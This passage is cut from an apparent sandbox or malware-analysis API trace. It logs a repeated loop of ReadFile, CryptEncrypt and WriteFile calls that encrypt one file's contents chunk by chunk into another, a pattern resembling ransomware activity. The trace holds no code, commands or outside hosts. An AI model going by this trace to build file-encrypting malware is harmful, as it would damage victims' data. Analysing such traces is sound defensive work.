pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.120] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.120] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.121] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.121] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.121] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.121] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.121] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.121] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.121] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.122] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.122] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.122] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.122] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.122] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.122] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.122] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.123] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.123] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.123] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.123] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.123] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.123] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.123] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.124] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.124] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.124] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.124] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.124] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.124] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.124] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.125] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.125] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.125] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.125] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.125] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.125] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.125] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.126] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.126] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.126] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.126] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.126] ReadFile (in: 